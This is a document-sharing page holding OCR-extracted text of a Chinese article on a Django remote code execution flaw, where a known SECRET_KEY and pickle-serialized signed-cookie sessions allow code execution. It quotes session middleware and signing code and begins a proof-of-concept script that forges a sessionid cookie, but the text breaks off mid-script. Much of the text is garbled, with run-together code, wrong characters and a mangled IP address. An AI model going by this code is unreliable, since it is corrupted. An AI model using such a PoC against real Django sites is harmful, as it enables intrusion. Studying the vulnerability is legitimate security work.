django任意代码执行漏洞分析

《django任意代码执行漏洞分析》由会员上传分享，免费在线阅读，更多相关内容在工程资料-天天文库。

1、Django任意代码执行漏洞分析从Django的SECTET_I

2、密的盐，这样就暴露了加密salt不太好吧,更重要的是对django的安全造成了极大的威胁。2SECRET_KEY作用SECTET_KEY在djanog中使用非常广泛，基本上涉及到安全，加密等的地方都用到了，下面列举一些常见情景:1,jsonobject的签名2、加密函数，如密码重置，表单，评论,csrf的key,session数据这里面就要重点讲到session的问题，在这里使用不当就会导致代码执行3代码执行3.1settings的session设置django默认存储session到数据库中，但是可能会比较慢,就会使用到缓存，文件，

3、还有cookie等方式，如果采用了cookie机制则有可能代码执行，settings配置如下：SESSION_ENGINE=Mjango.contrib.sessions.backends.signed__cookies,3.2django1.6以下在djangol.6以下,session默认是采用pickle执行序列号操作，在1.6及以上版本默认采用json序列化。代码执行只存在于使用pickle序列话的操作中。3.3session处理流程可以简单的分为两部分〉process_request和process_response,前者负

4、责选择session引擎，初始化cookie数据。见代码classSessionMiddleware(object):defprocess_request(self,request):engine=import_module(settings.SESSlON_ENGINE)session_keyrequest.COOKIES.get(settings.SESSION_COOKIE_NAME,None)process_response则是处理返回给用户的cookie信息?比如修改过期时间等。在将session存入缓存后，可能在某个操作中

5、会用到session信息，这个时候就会通过反序列化操作从缓存中取，如果反序列话引擎是采用pickle机制的话就存在代码执行。反序列化的代码位于django.core.signing.py中，这个模块主要是一些签名，加解密操作，同时也包含序列化和反序列化，默认采用JSON引擎，下面是反序列话loads的代码：Pythonjdefloads(s?key=None?salt=,django.core.signing1,seriali7er=JSONSerializer,max_age=None):WWWReverseofdumpsQ,rai

6、sesBadSignatureifsignaturefailssalt=salt).unsign(s,base64d=smart_str(TimestampSigner(key?max_age=max_age))decompress=False0ifbase64d[0]==7:#It!scompressed;uncompressitfirst1base64d=base64d[l:]decompress=True1data=b64_decode(base64d)ifdecompress:2data=zlib.decompress(dat

7、a)returnserializerQ.loads(data)453.4构造POCPythonimportosos.environ.setdefaultCDJANGO_SETTINGS_MODULE’settings)fromdjango.confimportsettingsfromdjango.coreimportsigningfromdjango.contrib.sessions.backendsimportsigned_cookiesclassRun(object):urlH.http■、一0・24・35・22pp8000、F

8、avicon・icc/6headersH(-coowsessionidH二ws-二％(sess)〉request:Hur三b2・Rcqucst(urLhcadcrsHheaders)7responseHUrllib2・u